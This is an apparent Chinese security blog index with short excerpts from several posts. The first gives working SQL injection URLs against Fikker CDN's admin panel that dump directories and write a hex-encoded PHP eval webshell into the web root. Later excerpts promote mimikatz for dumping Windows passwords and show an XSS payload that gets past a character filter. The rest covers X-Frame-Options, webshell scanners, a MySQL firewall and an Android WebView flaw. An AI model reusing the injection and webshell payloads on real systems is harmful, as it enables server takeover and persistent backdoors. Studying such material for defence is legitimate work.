Fikker 是一款面向 CDN/站长 的专业级网站缓存（Webcache）和反向代理服务器软件（Reversed Proxy Server）。近日在一起安全事件中发现fikker主控多个php文件存在高危注入漏洞，可获取Webshell 

#爆目录
admin_modify.php?id=-1%20union%20select%201,

@@basedir,3,4,5,6,7,8,9,10,11,12,13
#写一句话
admin_modify.php?id=1%20and%201=2%20union%20

select%200x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E,

0x3c3f2f2a,3,4,5,6,7,0x2a2f3f3e,9,10,11,12,13%20into%20outfile%20%27d:/FikkerCDN/webroot/fikcdn/admin/test.php%27

什么是x-frame-options 响应头
X-Frame-Options HTTP 响应头是用来给浏览器指示允许一个页面可否在 <frame>, </iframe> 或者 <object> 中展现的标记。网站可以使用此功能，来确保自己网站的内容没有被嵌到别人的网站中去，也从而避免了点击劫持 (clickjacking) 的攻击。

使用 X-Frame-Options
X-Frame-Options 有三个值:

DENY
表示该页面不允许在 frame 中展示，即便是在相同域名的页面中嵌套也不允许。
SAMEORIGIN

» 阅读全文

分享几个常用的web杀毒查杀后门软件，感觉还不错，对于网上一些下载的源码不放心的，

可以下载之后，扫扫哈。。。

360网站安全在线木马后门扫描查云杀平台

http://safe.webscan.360.cn/

D盾的web查杀。

http://www.d99net.net/News.asp?id=62

暗组的web杀毒
http://www.fsg2.org/archives/18/

护卫神web杀毒：
http://www.huweishen.com/soft/kill/

linux python版webshell智能查杀程序-SeayFindShell

http://www.cnseay.com/3984/

需要python 2.7 支持。

SQLassie是一款免费的MySQL数据库防火墙，可以实时阻断SQL注入攻击。SQLassie采用了Bayesian算法发现异常的SQL请求，相当的高效。

使用方式

SQLassie目前仅支持MySQL，开始使用前，你需要配置SQLassie以连接MySql数据库；启动后，SQLassie会在不同端口进行监听并保护数据库。

S1：启动SQLassie

./sqlassie -s /var/run/mysql/mysqld.sock -l 3307

S2：配置MediaWiki的配置文件LocalSettings.php，连接3307端口

$wgDBServer = "127.0.0.1:3307"

注意：这里不能使用localhost

下载地址

【基础知识】

   webview是Android用于浏览网页的组件，它的接口函数addJavascriptInterface可以实现网页JS与本地JAVA的交互，但是没有限制已注册JAVA类的方法调用，导致可以利用反射机制调用未注册的其它任何JAVA类。

  当Android用户访问恶意网页时，会被迫执行系统命令，如安装木马、盗取敏感数据等。

 

【漏洞重现】

构建一个使用Webview组件的程序，

1）AndroidManifest.xml添加网络访问权限

» 阅读全文

Burp Suite很多人都把他当成攻击工具了，其实，这就像菜刀一样，在厨师手里他只是切菜用的，而在坏人手里，他就是杀人工具，所以怎么用你懂的。

» 阅读全文

女神，借用电脑一看可否?我要mimikatz抓取你的windows密码

“女神，借用电脑一看可否?”

mimikatz是法国一个牛B的人写的轻量级调试器，

mimikatz 最近发布了它的2.0版本，抓密码命令更加简单了，估计作者也看到了对它这个神器最多的研究就是直接抓密码，为神马不发布一个直接一键版，哈哈哈哈哈。新 功能还包括能够通过获取的kerberos登录凭据，绕过支持RestrictedAdmin模式的win8或win2012svr的远程终端(RDP) 的登陆认证。建议默认禁止RestrictedAdmin模式登录。更多功能等着大家来发现

» 阅读全文

现在的小白也大体上懂得xss跨站攻击了，各种过滤手段层出不穷，还会过滤很多特殊符号和关键词，比如&、(、)、#、'、"，特别是&和括号，少了的话payload很难构造出来。

见代码：

<?php
header('X-XSS-Protection: 0');
$xss = isset($_GET['xss'])?$_GET['xss']:'';
$xss = str_replace(array("(",")","&","\\","<",">","'"), '', $xss);
echo "<img src=\"{$xss}\">";
?>

所有人肯定都知道，先闭合双引号，后面使用onerror事件触发XSS。输入xss=1" onerror=alert(1)，就可以构造成如下html：

» 阅读全文